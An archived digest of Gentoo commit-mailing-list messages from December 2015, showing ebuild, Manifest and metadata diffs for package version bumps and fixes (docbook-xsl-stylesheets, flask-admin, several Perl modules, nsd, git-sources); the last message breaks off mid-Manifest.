commit: cb9ccc19dea101055f86492949a7a56c1ccd7cc5
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 12:11:18 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 12:11:30 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=cb9ccc19

app-text/docbook-xsl-stylesheets: Fixed homepage variable in ebuilds.

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 .../docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.78.0-r1.ebuild| 2 +-
 app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild  | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git 
a/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.78.0-r1.ebuild 
b/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.78.0-r1.ebuild
index af418df..5090fde 100644
--- a/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.78.0-r1.ebuild
+++ b/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.78.0-r1.ebuild
@@ -9,7 +9,7 @@ MY_PN="${PN%-stylesheets}"
 MY_P="${MY_PN}-${PV}"
 
 DESCRIPTION="XSL Stylesheets for Docbook"
-HOMEPAGE="http://wiki.docbook.org/topic/DocBookXslStylesheets;
+HOMEPAGE="http://wiki.docbook.org/DocBookXslStylesheets;
 SRC_URI="mirror://sourceforge/docbook/${MY_P}.tar.bz2"
 
 LICENSE="BSD"

diff --git 
a/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild 
b/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild
index 5c3afc7..c40eaca 100644
--- a/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild
+++ b/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild
@@ -9,7 +9,7 @@ MY_PN="${PN%-stylesheets}"
 MY_P="${MY_PN}-${PV}"
 
 DESCRIPTION="XSL Stylesheets for Docbook"
-HOMEPAGE="http://wiki.docbook.org/topic/DocBookXslStylesheets;
+HOMEPAGE="http://wiki.docbook.org/DocBookXslStylesheets;
 SRC_URI="mirror://sourceforge/docbook/${MY_P}.tar.bz2"
 
 LICENSE="BSD"



[gentoo-commits] proj/lisp:master commit in: dev-lisp/trivial-gray-streams/

2015-12-14 Thread José María Alonso
commit: dbd4d9b6af822bfbd33557ed49982a3c430edb8c
Author: Chema Alonso Josa  gentoo  org>
AuthorDate: Mon Dec 14 11:40:47 2015 +
Commit: José María Alonso  gentoo  org>
CommitDate: Mon Dec 14 11:40:47 2015 +
URL:https://gitweb.gentoo.org/proj/lisp.git/commit/?id=dbd4d9b6

dev-lisp/trivial-gray-streams: move to common-lisp-3 eclass

 dev-lisp/trivial-gray-streams/trivial-gray-streams-20081102.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-lisp/trivial-gray-streams/trivial-gray-streams-20081102.ebuild 
b/dev-lisp/trivial-gray-streams/trivial-gray-streams-20081102.ebuild
index 51cbb70..5de48d7 100644
--- a/dev-lisp/trivial-gray-streams/trivial-gray-streams-20081102.ebuild
+++ b/dev-lisp/trivial-gray-streams/trivial-gray-streams-20081102.ebuild
@@ -2,7 +2,7 @@
 # Distributed under the terms of the GNU General Public License v2
 # $Id$
 
-inherit common-lisp-2
+inherit common-lisp-3
 
 MY_PV=${PV:0:4}-${PV:4:2}-${PV:6:2}
 MY_P=${PN}-${MY_PV}



[gentoo-commits] dev/dev-zero:master commit in: dev-python/flask-admin/

2015-12-14 Thread Tiziano Müller
commit: eb7c53370d2da0b7d204e1015c2e57da0a95ad0f
Author: Tiziano Müller  gentoo  org>
AuthorDate: Mon Dec 14 10:37:19 2015 +
Commit: Tiziano Müller  gentoo  org>
CommitDate: Mon Dec 14 10:37:19 2015 +
URL:https://gitweb.gentoo.org/dev/dev-zero.git/commit/?id=eb7c5337

dev-python/flask-admin: version bump

 dev-python/flask-admin/Manifest |  1 +
 dev-python/flask-admin/flask-admin-1.3.0.ebuild | 55 +
 dev-python/flask-admin/metadata.xml |  8 
 3 files changed, 64 insertions(+)

diff --git a/dev-python/flask-admin/Manifest b/dev-python/flask-admin/Manifest
new file mode 100644
index 000..8bd709b
--- /dev/null
+++ b/dev-python/flask-admin/Manifest
@@ -0,0 +1 @@
+DIST Flask-Admin-1.3.0.tar.gz 892104 SHA256 
750d2e72670a6f0cac82fa4185998cd3fa4146dde3b647002ee03a65242248a6 SHA512 
53c0b61a555ba5de3f0dd2cb0c844797b4855d9d6c6b325ebefba90193b0b7f16604c9c906a0675bfcdeacf693942e6ff745061143f17770ee9862d70b373a16
 WHIRLPOOL 
ed39a7b9c9935e428f1671aacf4101862dab80cb558aa9c80ddc4e5df9e1de8264d8f757ed8aca531ff1e70c4d08a922fccf1dfc7e9e54d74e3b1bd12561e766

diff --git a/dev-python/flask-admin/flask-admin-1.3.0.ebuild 
b/dev-python/flask-admin/flask-admin-1.3.0.ebuild
new file mode 100644
index 000..6425906
--- /dev/null
+++ b/dev-python/flask-admin/flask-admin-1.3.0.ebuild
@@ -0,0 +1,55 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+PYTHON_COMPAT=( python{2_7,3_4} )
+
+inherit distutils-r1
+
+#RESTRICT="test" # we're still missing some of the dependencies
+
+MY_PN="Flask-Admin"
+MY_P="${MY_PN}-${PV}"
+
+DESCRIPTION="Simple and extensible admin interface framework for Flask"
+HOMEPAGE="https://pypi.python.org/pypi/Flask-Admin;
+SRC_URI="mirror://pypi/${MY_P:0:1}/${MY_PN}/${MY_P}.tar.gz"
+
+LICENSE="BSD"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE="examples test"
+
+RDEPEND="
+   >=dev-python/flask-0.7[${PYTHON_USEDEP}]
+   dev-python/wtforms[${PYTHON_USEDEP}]"
+DEPEND="${RDEPEND}
+   dev-python/setuptools[${PYTHON_USEDEP}]
+   test? (
+   dev-python/nose[${PYTHON_USEDEP}]
+   dev-python/flask-wtf[${PYTHON_USEDEP}]
+   dev-python/flask-pymongo[${PYTHON_USEDEP}]
+   dev-python/flask-peewee[${PYTHON_USEDEP}]
+   dev-python/flask-mongoengine[${PYTHON_USEDEP}]
+   dev-python/flask-sqlalchemy[${PYTHON_USEDEP}]
+   dev-python/pillow[${PYTHON_USEDEP}]
+   )"
+
+S="${WORKDIR}/${MY_P}"
+
+python_prepare_all() {
+   sed \
+   -e 's:find_packages():find_packages(exclude=["*.examples", 
"*.examples.*", "examples.*", "examples"]):g' \
+   -i setup.py || die
+   distutils-r1_python_prepare_all
+}
+
+python_test() {
+   nosetests || die "Testing failed with ${EPYTHON}"
+}
+
+python_install_all() {
+   use examples && local EXAMPLES=( examples/. )
+   distutils-r1_python_install_all
+}

diff --git a/dev-python/flask-admin/metadata.xml 
b/dev-python/flask-admin/metadata.xml
new file mode 100644
index 000..1c2961d
--- /dev/null
+++ b/dev-python/flask-admin/metadata.xml
@@ -0,0 +1,8 @@
+
+http://www.gentoo.org/dtd/metadata.dtd;>
+
+  python
+  
+Flask-Admin
+  
+



[gentoo-commits] repo/gentoo:master commit in: dev-perl/Math-BigInt-GMP/

2015-12-14 Thread Patrice Clement
commit: 50ba2e9800f34c918898560c55c73e8be4971e8d
Author: Patrice Clement  gentoo  org>
AuthorDate: Mon Dec 14 09:58:25 2015 +
Commit: Patrice Clement  gentoo  org>
CommitDate: Mon Dec 14 10:55:08 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=50ba2e98

dev-perl/Math-BigInt-GMP: Version bump.

Package-Manager: portage-2.2.20.1
Signed-off-by: Patrice Clement  gentoo.org>

 dev-perl/Math-BigInt-GMP/Manifest  |  1 +
 .../Math-BigInt-GMP/Math-BigInt-GMP-1.460.0.ebuild | 27 ++
 2 files changed, 28 insertions(+)

diff --git a/dev-perl/Math-BigInt-GMP/Manifest 
b/dev-perl/Math-BigInt-GMP/Manifest
index b52f596..999135a 100644
--- a/dev-perl/Math-BigInt-GMP/Manifest
+++ b/dev-perl/Math-BigInt-GMP/Manifest
@@ -1 +1,2 @@
 DIST Math-BigInt-GMP-1.38.tar.gz 55585 SHA256 
1ad0cac911a08f150c5e5a8286aec20de21c863bd27b8f002456cff11e086f15 SHA512 
e33abe8c3b939e559be4e3ec61ce77a6fb3da6451ea88cb22fd4785cfebc816024e957ad02e81b43ee982346e0e444630ee5d93a87a02182a765374d1a694222
 WHIRLPOOL 
15c9d6fedd1f14401171b66a6094ef092ebf7ba991bbf82827da1d8973beed37adae4d0ba85e2aed0db9f5ec6f4bc4e12c1ed143645492ccf2b13b551e3f9922
+DIST Math-BigInt-GMP-1.46.tar.gz 58150 SHA256 
414a0c22d195ebc426fed535cf8dc6a3ca2de9da270c828c313c018ab5335772 SHA512 
4b8426d82e28fbd4d827f58f49540f0cc1d6c95b0ce5cdf9cd7c5c797b9fd534df57950d2f29dd5640b947005071a8f6c7d1235657710113e9e323444876
 WHIRLPOOL 
5b62bcffbd788ea8e97672c48e6e241e7f2a4ae52c60d9f58ceec973b6b39bccbb33367f841106be8f80f5336998568433534984a7e11ef3df1f99f7f8981e58

diff --git a/dev-perl/Math-BigInt-GMP/Math-BigInt-GMP-1.460.0.ebuild 
b/dev-perl/Math-BigInt-GMP/Math-BigInt-GMP-1.460.0.ebuild
new file mode 100644
index 000..86ecbad
--- /dev/null
+++ b/dev-perl/Math-BigInt-GMP/Math-BigInt-GMP-1.460.0.ebuild
@@ -0,0 +1,27 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+MODULE_AUTHOR=PJACKLAM
+MODULE_VERSION=1.46
+inherit perl-module
+
+DESCRIPTION="Use the GMP library for Math::BigInt routines"
+
+SLOT="0"
+KEYWORDS="~alpha ~amd64 ~hppa ~ppc ~sparc ~x86"
+IUSE=""
+
+RDEPEND=">=virtual/perl-Math-BigInt-1.999.300
+>=dev-libs/gmp-4.0.0"
+DEPEND="${RDEPEND}"
+
+PERL_RM_FILES=(
+   t/bigfltpm.t
+   t/bigintpm.t
+   t/biglog.t
+)
+
+SRC_TEST="do"



[gentoo-commits] repo/gentoo:master commit in: dev-perl/Math-Random-MT/

2015-12-14 Thread Patrice Clement
commit: c8dfd69f6fdf02d6d11735d6d27dcc7e9317c13d
Author: Patrice Clement  gentoo  org>
AuthorDate: Mon Dec 14 09:58:52 2015 +
Commit: Patrice Clement  gentoo  org>
CommitDate: Mon Dec 14 10:55:12 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c8dfd69f

dev-perl/Math-Random-MT: Clean up old.

Package-Manager: portage-2.2.20.1
Signed-off-by: Patrice Clement  gentoo.org>

 dev-perl/Math-Random-MT/Manifest   |  1 -
 .../Math-Random-MT-1.160.0-r1.ebuild   | 24 --
 .../Math-Random-MT/Math-Random-MT-1.170.0.ebuild   |  2 +-
 3 files changed, 1 insertion(+), 26 deletions(-)

diff --git a/dev-perl/Math-Random-MT/Manifest b/dev-perl/Math-Random-MT/Manifest
index 18bf178..d4f3a5a 100644
--- a/dev-perl/Math-Random-MT/Manifest
+++ b/dev-perl/Math-Random-MT/Manifest
@@ -1,2 +1 @@
-DIST Math-Random-MT-1.16.tar.gz 11138 SHA256 
3c13cfd605e6610985c5475d6fa4f55533c205d897d6d18a9f56f5f9cc3c8aca SHA512 
ad2019c847aade876dce0e0c4f309dad39a6b2be18023bfdb5c481b8042230639877c27c01c4f63226d43125e429e616632f38c4d542868bfc55e741dc7ef6ab
 WHIRLPOOL 
be0a35ebe6a440511f864d58fe596f656d2b7c71269a261ec631553a4a53388919573a5a5bd26feed7a3d4a9305271e170110d097d0005ffe38ae9f33eae0a24
 DIST Math-Random-MT-1.17.tar.gz 11999 SHA256 
069a1d98a619cba1f1ab91fbd6edceb642e84e7d162c4f0e2442139037b5b0da SHA512 
46150ae8d1b7a0e24a2d962bb34c4075d9370ab3fe1237a0b44e506f22699bf1674a8299d1c4b708b441d45a29ca1943d0beeb9759c5c832df288d490f1ac889
 WHIRLPOOL 
b484ca74d7072f6b4c9a57c5f3abfb5bb5068264251548224117467f0a3b435eee9e6b66a1db7665d1af4638077debbe30d8ab8ccf3053bf44b5a1b4b39cc587

diff --git a/dev-perl/Math-Random-MT/Math-Random-MT-1.160.0-r1.ebuild 
b/dev-perl/Math-Random-MT/Math-Random-MT-1.160.0-r1.ebuild
deleted file mode 100644
index 8d34c5d..000
--- a/dev-perl/Math-Random-MT/Math-Random-MT-1.160.0-r1.ebuild
+++ /dev/null
@@ -1,24 +0,0 @@
-# Copyright 1999-2014 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-MODULE_AUTHOR=FANGLY
-MODULE_VERSION=1.16
-inherit perl-module
-
-DESCRIPTION="The Mersenne Twister PRNG"
-
-LICENSE="BSD"
-SLOT="0"
-KEYWORDS="~amd64 ~x86"
-IUSE="test"
-
-DEPEND="
-   test? (
-   dev-perl/Test-Number-Delta
-   )
-"
-
-SRC_TEST=do

diff --git a/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild 
b/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild
index ef03a6d..4e90e6b 100644
--- a/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild
+++ b/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild
@@ -1,4 +1,4 @@
-# Copyright 1999-2014 Gentoo Foundation
+# Copyright 1999-2015 Gentoo Foundation
 # Distributed under the terms of the GNU General Public License v2
 # $Id$
 



[gentoo-commits] repo/gentoo:master commit in: dev-perl/Math-Random-MT/

2015-12-14 Thread Patrice Clement
commit: c7c82202b786de01f5ac41b60e6aa8a8fb9ef10a
Author: Patrice Clement  gentoo  org>
AuthorDate: Mon Dec 14 09:58:00 2015 +
Commit: Patrice Clement  gentoo  org>
CommitDate: Mon Dec 14 10:55:02 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c7c82202

dev-perl/Math-Random-MT: Version bump.

Package-Manager: portage-2.2.20.1
Signed-off-by: Patrice Clement  gentoo.org>

 dev-perl/Math-Random-MT/Manifest   |  1 +
 .../Math-Random-MT/Math-Random-MT-1.170.0.ebuild   | 24 ++
 2 files changed, 25 insertions(+)

diff --git a/dev-perl/Math-Random-MT/Manifest b/dev-perl/Math-Random-MT/Manifest
index 9be255d..18bf178 100644
--- a/dev-perl/Math-Random-MT/Manifest
+++ b/dev-perl/Math-Random-MT/Manifest
@@ -1 +1,2 @@
 DIST Math-Random-MT-1.16.tar.gz 11138 SHA256 
3c13cfd605e6610985c5475d6fa4f55533c205d897d6d18a9f56f5f9cc3c8aca SHA512 
ad2019c847aade876dce0e0c4f309dad39a6b2be18023bfdb5c481b8042230639877c27c01c4f63226d43125e429e616632f38c4d542868bfc55e741dc7ef6ab
 WHIRLPOOL 
be0a35ebe6a440511f864d58fe596f656d2b7c71269a261ec631553a4a53388919573a5a5bd26feed7a3d4a9305271e170110d097d0005ffe38ae9f33eae0a24
+DIST Math-Random-MT-1.17.tar.gz 11999 SHA256 
069a1d98a619cba1f1ab91fbd6edceb642e84e7d162c4f0e2442139037b5b0da SHA512 
46150ae8d1b7a0e24a2d962bb34c4075d9370ab3fe1237a0b44e506f22699bf1674a8299d1c4b708b441d45a29ca1943d0beeb9759c5c832df288d490f1ac889
 WHIRLPOOL 
b484ca74d7072f6b4c9a57c5f3abfb5bb5068264251548224117467f0a3b435eee9e6b66a1db7665d1af4638077debbe30d8ab8ccf3053bf44b5a1b4b39cc587

diff --git a/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild 
b/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild
new file mode 100644
index 000..ef03a6d
--- /dev/null
+++ b/dev-perl/Math-Random-MT/Math-Random-MT-1.170.0.ebuild
@@ -0,0 +1,24 @@
+# Copyright 1999-2014 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+MODULE_AUTHOR=FANGLY
+MODULE_VERSION=1.17
+inherit perl-module
+
+DESCRIPTION="The Mersenne Twister PRNG"
+
+LICENSE="BSD"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE="test"
+
+DEPEND="
+   test? (
+   dev-perl/Test-Number-Delta
+   )
+"
+
+SRC_TEST=do



[gentoo-commits] repo/gentoo:master commit in: dev-perl/File-Slurper/

2015-12-14 Thread Patrice Clement
commit: d9c35e53af1fad0738add69071da06925ca47f50
Author: Patrice Clement  gentoo  org>
AuthorDate: Mon Dec 14 10:09:00 2015 +
Commit: Patrice Clement  gentoo  org>
CommitDate: Mon Dec 14 10:55:14 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=d9c35e53

dev-perl/File-Slurper: Initial commit

Package-Manager: portage-2.2.20.1
Signed-off-by: Patrice Clement  gentoo.org>

 dev-perl/File-Slurper/File-Slurper-0.0.800.ebuild | 17 +
 dev-perl/File-Slurper/Manifest|  1 +
 dev-perl/File-Slurper/metadata.xml| 12 
 3 files changed, 30 insertions(+)

diff --git a/dev-perl/File-Slurper/File-Slurper-0.0.800.ebuild 
b/dev-perl/File-Slurper/File-Slurper-0.0.800.ebuild
new file mode 100644
index 000..e5e8d15
--- /dev/null
+++ b/dev-perl/File-Slurper/File-Slurper-0.0.800.ebuild
@@ -0,0 +1,17 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+MODULE_AUTHOR=LEONT
+MODULE_VERSION=0.008
+inherit perl-module
+
+DESCRIPTION="A simple, sane and efficient module to slurp a file"
+
+SLOT="0"
+KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc ~x86"
+IUSE=""
+
+SRC_TEST="do"

diff --git a/dev-perl/File-Slurper/Manifest b/dev-perl/File-Slurper/Manifest
new file mode 100644
index 000..4e4ec38
--- /dev/null
+++ b/dev-perl/File-Slurper/Manifest
@@ -0,0 +1 @@
+DIST File-Slurper-0.008.tar.gz 14760 SHA256 
10f685140e2cebdd0381f24b010b028f9ca2574361a78f99f4dfe87af5d5d233 SHA512 
b0d82e18f8d954bf7458df31a70bc2eb979902742ba0f60f948aec6c86880580a544a00409be754a7690c07318298f31d52502e41c40a7c7b232ad86eae9b155
 WHIRLPOOL 
e48a2bbfc152b1dc273d6ce6238bcdbf655df215ab940568e828f0ba1814550091aabb2967f4cdfc5f49e16ae8b16fe7a1a0d6c0095741c612cad1d17d38f15b

diff --git a/dev-perl/File-Slurper/metadata.xml 
b/dev-perl/File-Slurper/metadata.xml
new file mode 100644
index 000..d47da5b
--- /dev/null
+++ b/dev-perl/File-Slurper/metadata.xml
@@ -0,0 +1,12 @@
+
+http://www.gentoo.org/dtd/metadata.dtd;>
+
+  perl
+  
+ monsie...@gentoo.org
+  
+  
+File-Slurper
+File::Slurper
+  
+



[gentoo-commits] repo/gentoo:master commit in: dev-perl/Pod-POM/

2015-12-14 Thread Patrice Clement
commit: b9fb83709e5e20ac6e90234ecb116a02d307081b
Author: Patrice Clement  gentoo  org>
AuthorDate: Mon Dec 14 10:09:33 2015 +
Commit: Patrice Clement  gentoo  org>
CommitDate: Mon Dec 14 10:55:18 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=b9fb8370

dev-perl/Pod-POM: Version bump.

Package-Manager: portage-2.2.20.1
Signed-off-by: Patrice Clement  gentoo.org>

 dev-perl/Pod-POM/Manifest  |  1 +
 dev-perl/Pod-POM/Pod-POM-2.10.0.ebuild | 25 +
 2 files changed, 26 insertions(+)

diff --git a/dev-perl/Pod-POM/Manifest b/dev-perl/Pod-POM/Manifest
index 1c40625..93675c6 100644
--- a/dev-perl/Pod-POM/Manifest
+++ b/dev-perl/Pod-POM/Manifest
@@ -1,2 +1,3 @@
 DIST Pod-POM-0.28.tar.gz 76105 SHA256 
381686661dc02d880e8c64425dcf8ced18e1cb98223d4288f00e3d21e4c4641e SHA512 
d154509505eadb019994fa52d8013ead0eea8f1304330923a2093980478ad113c72fd0da0a26829ab752234d884d2bda16cbc7ddc17975852e3a86dd496b177f
 WHIRLPOOL 
7bcef31086fec7104596045f13c5e64a15305c3201ad976a8c5cffe91e968705b89e12bcda4a318f4f83edbc502bb073f34467547e11db758de8cbda130f2cc2
 DIST Pod-POM-0.29.tar.gz 74337 SHA256 
5f7632b04d911ae37136709d6554f9cfccba8b86d308a7708b3068536e9873d5 SHA512 
7847507d1fb5589c8f48b080862c25264d08de60ae46d6bf23ba9daf0ecedf983c7beb223c64403add88db5ac72056c2d8b7aaf87aec54438d6730d77b8c7741
 WHIRLPOOL 
978dd276c422f87d46cbba4a60ee9b2bbb0cc2d650aad91004b0e93ba4bf292bee17df56cdd6ce85f8e443344120ad37407a9e960b02a74feab6321d3a38
+DIST Pod-POM-2.01.tar.gz 65443 SHA256 
1b50fba9bbdde3ead192beeba0eaddd0c614e3afb1743fa6fff805f57c56f7f4 SHA512 
617b1c15dbaee7dfd53f7b158c08e34c38763b11fbdbe44d3a1c65bfca15b44d6d1b19b6a59360dd62a7d9e703498e76237350fb57040f39837f8190fbdbd7b0
 WHIRLPOOL 
b46d5086334250fd629b6f375579f43149e8e9e873e9ca97175267082794fa006ead7d26ab5f2fbc0ac8f42a221677d8d2167bbce0b554a2650de80d3043fce5

diff --git a/dev-perl/Pod-POM/Pod-POM-2.10.0.ebuild 
b/dev-perl/Pod-POM/Pod-POM-2.10.0.ebuild
new file mode 100644
index 000..25af4f8
--- /dev/null
+++ b/dev-perl/Pod-POM/Pod-POM-2.10.0.ebuild
@@ -0,0 +1,25 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+MODULE_AUTHOR=NEILB
+MODULE_VERSION=2.01
+inherit perl-module
+
+DESCRIPTION="POD Object Model"
+
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE="test"
+
+RDEPEND="virtual/perl-parent"
+DEPEND="
+   test? (
+   >=dev-perl/yaml-0.67
+   dev-perl/File-Slurper
+   dev-perl/Test-Differences
+   )"
+
+SRC_TEST=do



[gentoo-commits] repo/gentoo:master commit in: net-dns/nsd/

2015-12-14 Thread Lars Wendler
commit: 53b13a92beb14c6356ed4fb8bc72161b0827dfca
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 10:41:16 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 10:41:16 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=53b13a92

net-dns/nsd: Bump to versions 3.2.20 and 4.1.7 (bug #541036).

Proxy commit for Tom Hendrikx.

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 net-dns/nsd/Manifest  |  2 +
 net-dns/nsd/nsd-3.2.20.ebuild | 81 
 net-dns/nsd/nsd-4.1.7.ebuild  | 96 +++
 3 files changed, 179 insertions(+)

diff --git a/net-dns/nsd/Manifest b/net-dns/nsd/Manifest
index 806cd1e..d339e70 100644
--- a/net-dns/nsd/Manifest
+++ b/net-dns/nsd/Manifest
@@ -1,2 +1,4 @@
 DIST nsd-3.2.18.tar.gz 924566 SHA256 
541047c2114466d6fa7d7b9f397f632e542750475f1fcef5339da86a1ebdfcdb SHA512 
888618b51f8ec85413a95a9733198a5affc420b1a8c3b00ed18c8f73f1a0d0654b334ff22076adab23bac56ccb3684cb551ebec426d3d0df939eee24ae66044f
 WHIRLPOOL 
0d4ea8d6e26fc517404e6ebc427774a9c1f4ec7c7c096f7adc5ba51f3fa218215f666dd848a48650bba502ceb4d2795ecb264014f5f31409290937b089b4f062
+DIST nsd-3.2.20.tar.gz 925600 SHA256 
cc3f04291a043d5350e67e1590003429ebf64975367858f70b3bf623ce609e16 SHA512 
9decbdde984ec6b8d491f57a2a38441415721f108898f552a19740ed51c56e049cb01059952937841a2f8ea9574e3ee6a03177a4c23e827295c1fd6afbcd3d99
 WHIRLPOOL 
713d1d596c1176983e40a658f1033ba1275d23abcde9f3902c76823a2071ee3230baa21b9dc5af65c8abe270fbb242fb521b4246caee3d12818fe530c69c
 DIST nsd-4.1.0.tar.gz 1056649 SHA256 
ec3f6902f6f26a6b9248dcd7e9f42472fa52755740b4ba6b9d3bd08910b39b62 SHA512 
1e49c14108b201ff8f14f58a9aae8ee4a69fba2e9494bdffc20ac079bff437ce91b069852d0aac639ec860a258b0b222b72269e62ad7b433c3df8d06afea8f03
 WHIRLPOOL 
6041ed2292412c91d3a7828727b5cf5f85cc6a0088e51cb791d2f56cfab2b8358627e1af7517091c3f119ce83218763dbd54279c88137c509bcf9e48c3049f94
+DIST nsd-4.1.7.tar.gz 1072576 SHA256 
7ba8beb29b495ab795e927d9aa82a5bb1b66296a78f61ed47d6ccfe59e9b1a8a SHA512 
c2bdb03a09ac06d70feef2183e2d77ba7830777bac67ab974016f52791ad7ed9227a37a31325f5e4ab4baeacc4cb562d5af4cd85e5b6ddc83422ae5d0df8
 WHIRLPOOL 
4ba203a4f5e365f8f850436b9d721fa1d50dd180bfec14d6ab7ab3b89d2ff5a7fd5bc93c1f8b304a2fe5a070d4f3ae4f5786eeb8d9fbb159c53f12346d0342ba

diff --git a/net-dns/nsd/nsd-3.2.20.ebuild b/net-dns/nsd/nsd-3.2.20.ebuild
new file mode 100644
index 000..94a89c9
--- /dev/null
+++ b/net-dns/nsd/nsd-3.2.20.ebuild
@@ -0,0 +1,81 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+inherit user
+
+DESCRIPTION="An authoritative only, high performance, open source name server"
+HOMEPAGE="http://www.nlnetlabs.nl/projects/nsd;
+MY_PV=${PV/_rc/rc}
+MY_PV=${MY_PV/_beta/b}
+MY_P=${PN}-${MY_PV}
+S="${WORKDIR}/${MY_P}"
+SRC_URI="http://www.nlnetlabs.nl/downloads/${PN}/${MY_P}.tar.gz;
+
+LICENSE="BSD"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE="bind8-stats ipv6 minimal-responses mmap +nsec3 ratelimit root-server 
runtime-checks zone-stats"
+
+RDEPEND="
+   dev-libs/openssl:0=
+   virtual/yacc
+"
+DEPEND="
+   ${RDEPEND}
+   sys-devel/flex
+"
+
+pkg_setup() {
+   enewgroup nsd
+   enewuser nsd -1 -1 -1 nsd
+}
+
+src_configure() {
+   # ebuild.sh sets localstatedir to /var/lib, but nsd expects /var in 
several locations
+   # some of these cannot be changed by arguments to econf/configure, f.i. 
logfile
+   econf \
+   --localstatedir="${EPREFIX}/var" \
+   --with-pidfile="${EPREFIX}/var/run/nsd/nsd.pid" \
+   --with-zonesdir="${EPREFIX}/var/lib/nsd" \
+   --enable-largefile \
+   $(use_enable bind8-stats) \
+   $(use_enable ipv6) \
+   $(use_enable minimal-responses) \
+   $(use_enable mmap) \
+   $(use_enable nsec3) \
+   $(use_enable ratelimit) \
+   $(use_enable root-server) \
+   $(use_enable runtime-checks checking) \
+   $(use_enable zone-stats)
+}
+
+src_install() {
+   emake DESTDIR="${D}" install
+
+   dodoc 
doc/{ChangeLog,CREDITS,NSD-FOR-BIND-USERS,README,RELNOTES,REQUIREMENTS}
+
+   insinto /usr/share/nsd
+   doins contrib/nsd.zones2nsd.conf
+
+   exeinto /etc/cron.daily
+   newexe "${FILESDIR}"/nsd3-patch.cron nsd-patch.cron
+
+   newinitd "${FILESDIR}"/nsd3.initd-r1 nsd
+
+   # database directory, writable by nsd for database updates and zone 
transfers
+   dodir /var/db/nsd
+   fowners nsd:nsd /var/db/nsd
+   fperms 750 /var/db/nsd
+
+   # zones directory, writable by root for 'nsdc patch'
+   dodir /var/lib/nsd
+   fowners root:nsd /var/lib/nsd
+   fperms 750 /var/lib/nsd
+
+   # remove /var/run data created by Makefile, handled by initd script
+   rm -r "${ED}"/var/run || die "could not 

[gentoo-commits] repo/gentoo:master commit in: sys-kernel/git-sources/

2015-12-14 Thread Mike Pagano
commit: d2dd5586829830f81f532301c107a6df99ec1e56
Author: Mike Pagano  gentoo  org>
AuthorDate: Mon Dec 14 11:31:56 2015 +
Commit: Mike Pagano  gentoo  org>
CommitDate: Mon Dec 14 11:31:56 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=d2dd5586

sys-kernel/git-sources: Linux patch 4.4_rc5

Package-Manager: portage-2.2.24

 sys-kernel/git-sources/Manifest   |  1 +
 sys-kernel/git-sources/git-sources-4.4_rc5.ebuild | 40 +++
 2 files changed, 41 insertions(+)

diff --git a/sys-kernel/git-sources/Manifest b/sys-kernel/git-sources/Manifest
index e8ad82e..21372d1 100644
--- a/sys-kernel/git-sources/Manifest
+++ b/sys-kernel/git-sources/Manifest
@@ -3,3 +3,4 @@ DIST patch-4.4-rc1.xz 6387896 SHA256 
3870efdb5dfdbcb17d5a233e8e9c69156609825a3fb
 DIST patch-4.4-rc2.xz 6472332 SHA256 
04a2fe6ce8711a01617e459d6908bfbd7715a0e4106fbd05372e12ba7ad03158 SHA512 
c4690fa99a3e2f48de8093c3ce68605e79fdb12dde2483a5f147c43fefaa5002153f50006599a2f0b59a014265dcaf4bf16925bcea674b9a82f0ddac2cdc88ae
